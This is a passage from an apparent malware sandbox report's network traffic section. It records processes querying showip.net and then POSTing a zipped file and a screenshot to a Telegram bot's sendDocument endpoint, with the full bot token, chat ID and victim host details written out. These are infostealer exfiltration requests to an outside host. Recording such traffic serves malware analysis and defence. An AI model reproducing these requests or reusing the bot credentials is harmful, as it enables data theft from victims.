Dec 3, 2024 14:27:31.708432913 CET	1236	IN	Data Raw: 64 2c 65 29 26 26 28 61 5b 65 5d 3d 64 5b 65 5d 29 7d 72 65 74 75 72 6e 20 61 7d 3b 68 61 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 6e 61 7d 29 3b 0a 0a 20 20 20 20 20 20 Data Ascii: d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a\|\|na}); var p=this\|\|self;function q(a){return a};var t,u;a:{for(var oa=["CLOSURE_FLAGS"],v=p,x=0;x<oa.length;x++)if(v=v[oa[x]],null==v){u=null;break a}u=v}var pa=u&&u[61
Dec 3, 2024 14:27:31.708446980 CET	1236	IN	Data Raw: 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c 31 29 29 7d 0a 20 20 20 20 20 20 76 61 72 20 48 3d 46 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5b 46 5d 7c 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 Data Ascii: .slice.call(a)),I(a,b\|1))} var H=F?function(a){return a[F]\|0}:function(a){return a.g\|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a,b){void 0!==a.g?a.g=b:Object.defineProperties(a,{g:{value:b
Dec 3, 2024 14:27:31.708475113 CET	1236	IN	Data Raw: 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d 3b 66 75 6e 63 74 69 6f 6e 20 41 61 28 61 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 61 29 7b 63 61 73 65 20 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 20 69 73 46 69 6e 69 Data Ascii: )}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a instanceof Uint8Array){if(ua){for(var b="",c=0,d=a.length-102
Dec 3, 2024 14:27:31.708489895 CET	1236	IN	Data Raw: 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 61 3d 65 26 26 30 3d 3d 61 2e 6c 65 6e 67 74 68 26 26 48 28 61 29 26 31 3f 76 6f 69 64 20 30 3a 66 26 26 48 28 61 29 26 32 3f 61 3a 45 61 28 61 2c 62 2c 63 2c 76 Data Ascii: ull!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=Da(a[h],b,c,d,e,f));a=g}else a=b(a,d);return a}} functi
Dec 3, 2024 14:27:31.708631039 CET	1236	IN	Data Raw: 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d 3d 7b 7d 3b 65 7c 3d 32 35 36 7d 66 5b 63 5d 3d 64 3b 65 26 3d 2d 31 30 32 35 3b 65 21 3d 3d 62 26 26 49 28 61 2c 65 29 7d 65 6c 73 65 20 61 5b 63 2b 28 28 62 3e 3e 39 26 31 29 2d Data Ascii: rn;f=a[f+((b>>9&1)-1)]={};e\|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c=Ma;var d=void 0===d?!1:d;var e=a.h;var f=J(e),g=Ja(e,f,b,d)
Dec 3, 2024 14:27:31.708645105 CET	1236	IN	Data Raw: 77 3d 30 3b 77 3c 64 2e 6c 65 6e 67 74 68 3b 77 2b 2b 29 69 66 28 6b 3d 64 5b 77 5d 2c 6b 3c 61 29 7b 6b 2b 3d 67 3b 76 61 72 20 72 3d 65 5b 6b 5d 3b 6e 75 6c 6c 3d 3d 72 3f 65 5b 6b 5d 3d 63 3f 4f 3a 77 61 28 29 3a 63 26 26 72 21 3d 3d 4f 26 26 Data Ascii: w=0;w<d.length;w++)if(k=d[w],k<a){k+=g;var r=e[k];null==r?e[k]=c?O:wa():c&&r!==O&&va(r)}else h\|\|(r=void 0,e.length&&N(r=e[e.length-1])?h=r:e.push(h={})),r=h[k],null==h[k]?h[k]=c?O:wa():c&&r!==O&&va(r)}d=b.length;if(!d)return b; var Ca;if
Dec 3, 2024 14:27:31.708673000 CET	1236	IN	Data Raw: 65 6e 64 43 68 69 6c 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 7d 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 58 61 28 61 2c 62 29 7b 61 2e 73 72 63 3d 62 20 69 6e 73 74 61 6e 63 65 Data Ascii: endChild=function(a,b){a.appendChild(b)}; function Xa(a,b){a.src=b instanceof V&&b.constructor===V?b.g:"type_error:TrustedResourceUrl";var c,d;(c=(b=null==(d=(c=(a.ownerDocument&&a.ownerDocument.defaultView\|\|window).document).querySelec
Dec 3, 2024 14:27:31.828497887 CET	1236	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 62 28 61 2c 33 29 7d 2c 35 30 29 7d 3b 5a 61 28 61 2e 6c 2c 61 2e 75 2c 32 2c 21 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 70 5b 61 2e 6f 5d 7c 7c 62 28 29 7d 2c 62 29 3b 61 2e 6d 3d 21 30 7d 7d Data Ascii: unction(){return gb(a,3)},50)};Za(a.l,a.u,2,!0,function(){p[a.o]\|\|b()},b);a.m=!0}} function fb(a){for(var b=W(1,5),c=0;c<b;c++){var d=X(a);a.i.body.appendChild(d);a.j.push(d)}b=X(a);b.style.bottom="0";b.style.left="0";b.style.position="f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	162.55.60.2	80	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 14:27:30.473855019 CET	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
Dec 3, 2024 14:27:31.803172112 CET	1236	IN	HTTP/1.1 200 OK Access-Control-Allow-Headers: * Access-Control-Allow-Methods: * Access-Control-Allow-Origin: * Content-Type: text/html;charset=utf-8 Date: Tue, 03 Dec 2024 13:27:31 GMT Server: Caddy Transfer-Encoding: chunked Data Raw: 34 36 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 4c 36 4e 4b 54 35 47 36 44 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 4c 36 4e 4b 54 35 47 36 44 37 27 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e [TRUNCATED] Data Ascii: 46f8<!DOCTYPE html><html lang="en"> <head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-L6NKT5G6D7'); </script> <script async src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Dec 3, 2024 14:27:31.803205013 CET	1236	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;
Dec 3, 2024 14:27:31.803217888 CET	1236	IN	Data Raw: 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 22 70 72 6f 74 6f 74 79 70 65 22 21 3d 63 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 Data Ascii: var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.A=b.prototype}function ma(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=argu
Dec 3, 2024 14:27:31.803339005 CET	1236	IN	Data Raw: 67 65 22 29 29 7c 7c 28 43 28 29 3f 41 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 42 28 22 45 64 67 2f 22 29 29 7c 7c 43 28 29 26 26 41 28 22 4f 70 65 72 61 22 29 29 3b 76 61 72 20 73 61 3d 7b 7d 2c 45 3d 6e 75 6c 6c 3b 76 61 72 20 Data Ascii: ge"))\|\|(C()?A("Microsoft Edge"):B("Edg/"))\|\|C()&&A("Opera"));var sa={},E=null;var ta="undefined"!==typeof Uint8Array,ua=!ra&&"function"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b
Dec 3, 2024 14:27:31.803498983 CET	1236	IN	Data Raw: 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 64 3d 48 28 61 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 Data Ascii: ay(a))throw Error();d=H(a);if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error();a:{c=a;var e=c.length;if(e){var f=e-1,g=c[f];if(N(g)){d\|=256;b=(d>>9&1)-1;e=f-b;1024<=e&&(za(c,b,g),e=1023);d=d&-2095105\|(e&1023)<<11;break a}}b&&(g=(d>>9&
Dec 3, 2024 14:27:31.803513050 CET	1236	IN	Data Raw: 3d 62 5b 28 77 26 31 35 29 3c 3c 32 7c 68 3e 3e 36 5d 3b 68 3d 62 5b 68 26 36 33 5d 3b 63 5b 65 2b 2b 5d 3d 67 2b 6b 2b 77 2b 68 7d 67 3d 30 3b 68 3d 64 3b 73 77 69 74 63 68 28 61 2e 6c 65 6e 67 74 68 2d 66 29 7b 63 61 73 65 20 32 3a 67 3d 61 5b Data Ascii: =b[(w&15)<<2\|h>>6];h=b[h&63];c[e++]=g+k+w+h}g=0;h=d;switch(a.length-f){case 2:g=a[f+1],h=b[(g&15)<<2]\|\|d;case 1:a=a[f],c[e]=b[a>>2]+b[(a&3)<<4\|g>>4]+h+d}a=c.join("")}return a}}return a};function Ba(a,b,c){a=Array.prototype.slice.call(a);var d=
Dec 3, 2024 14:27:31.803525925 CET	1236	IN	Data Raw: 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 63 7c 7c 62 26 32 3f 4b 3a 78 61 2c 65 3d 21 21 28 62 26 33 32 29 3b 61 3d 42 61 28 61 2c 62 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e Data Ascii: urn a}}function Ha(a,b,c){var d=c\|\|b&2?K:xa,e=!!(b&32);a=Ba(a,b,function(f){return Ga(f,e,d)});G(a,32\|(c?2:0));return a};function Ia(a,b){a=a.h;return Ja(a,J(a),b)}function Ja(a,b,c,d){if(-1===c)return null;if(c>=L(b)){if(b&256)return a[a.leng
Dec 3, 2024 14:27:31.803539038 CET	1236	IN	Data Raw: 74 6f 4a 53 4f 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 61 28 74 68 69 73 2e 68 2c 46 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e Data Ascii: toJSON=function(){var a=Ea(this.h,Fa,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if
Dec 3, 2024 14:27:31.803718090 CET	1236	IN	Data Raw: 28 61 29 7b 74 68 69 73 2e 68 3d 52 28 61 29 7d 6e 28 52 61 2c 54 29 3b 76 61 72 20 53 61 3d 51 61 28 52 61 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 Data Ascii: (a){this.h=R(a)}n(Ra,T);var Sa=Qa(Ra);var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())
Dec 3, 2024 14:27:31.803735018 CET	1236	IN	Data Raw: 32 46 74 59 6d 56 79 58 7a 49 30 5a 48 41 75 63 47 35 6e 22 29 2c 61 62 3d 70 2e 61 74 6f 62 28 22 57 57 39 31 49 47 46 79 5a 53 42 7a 5a 57 56 70 62 6d 63 67 64 47 68 70 63 79 42 74 5a 58 4e 7a 59 57 64 6c 49 47 4a 6c 59 32 46 31 63 32 55 67 59 Data Ascii: 2FtYmVyXzI0ZHAucG5n"),ab=p.atob("WW91IGFyZSBzZWVpbmcgdGhpcyBtZXNzYWdlIGJlY2F1c2UgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlIGlzIGludGVyZmVyaW5nIHdpdGggdGhpcyBwYWdlLg=="),bb=p.atob("RGlzYWJsZSBhbnkgYWQgb3Igc2NyaXB0IGJsb2NraW5nIHNvZnR3YXJlLCB0aGVu
Dec 3, 2024 14:27:31.923413038 CET	1236	IN	Data Raw: 2c 22 49 4d 47 22 29 3b 64 2e 63 6c 61 73 73 4e 61 6d 65 3d 55 61 28 29 3b 64 2e 73 72 63 3d 24 61 3b 64 2e 61 6c 74 3d 22 57 61 72 6e 69 6e 67 20 69 63 6f 6e 22 3b 64 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 32 34 70 78 22 3b 64 2e 73 74 79 Data Ascii: ,"IMG");d.className=Ua();d.src=$a;d.alt="Warning icon";d.style.height="24px";d.style.width="24px";d.style["padding-right"]="16px";var e=X(a),f=X(a);f.style["font-weight"]="bold";f.textContent=ab;var g=X(a);g.textContent=bb;Y(a,e,f);Y(a,e,g);Y(

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49732	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:39 UTC	557	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 13917 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:39 UTC	13917	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 69 6c 65 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 1d 4a 44 57 19 a3 19 73 86 02 00 00 02 04 00 00 14 00 00 00 46 69 6c 65 73 2f 42 4a 5a 46 50 50 57 41 50 54 2e 70 64 66 15 93 49 8e 40 21 08 44 f7 9d f4 a1 10 bf 38 82 f3 74 ff 83 b4 bd 23 91 40 d5 b3 50 fe 9a 9c 17 e4 7e 5d a3 c1 ba e9 fd 41 37 38 36 d0 67 b0 f7 1b 14 9b 63 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="Files.zip"Content-Type: application/octet-streamPKJDWsFiles/BJZFPPWAPT.pdfI@!D8t#@P~]A786gc
2024-12-03 13:27:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:27:40 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:27:40 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 46 69 6c 65 Data Ascii: {"ok":true,"result":{"message_id":3880,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232460,"document":{"file_name":"File

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49733	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:40 UTC	557	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-FG:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 13917 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:40 UTC	13917	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 69 6c 65 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 08 00 1d 4a 44 57 19 a3 19 73 86 02 00 00 02 04 00 00 14 00 00 00 46 69 6c 65 73 2f 42 4a 5a 46 50 50 57 41 50 54 2e 70 64 66 15 93 49 8e 40 21 08 44 f7 9d f4 a1 10 bf 38 82 f3 74 ff 83 b4 bd 23 91 40 d5 b3 50 fe 9a 9c 17 e4 7e 5d a3 c1 ba e9 fd 41 37 38 36 d0 67 b0 f7 1b 14 9b 63 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="Files.zip"Content-Type: application/octet-streamPKJDWsFiles/BJZFPPWAPT.pdfI@!D8t#@P~]A786gc
2024-12-03 13:27:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:27:41 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-03 13:27:41 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 32 35 30 33 30 32 39 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 62 69 6c 6f 67 73 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 37 33 32 34 35 36 36 36 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4f 62 61 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4f 62 64 6f 6e 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 33 32 33 32 34 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 46 69 6c 65 Data Ascii: {"ok":true,"result":{"message_id":3881,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1733232460,"document":{"file_name":"File

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49758	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:53 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 71 53 62 46 70 59 52 59 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotqSbFpYRY.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
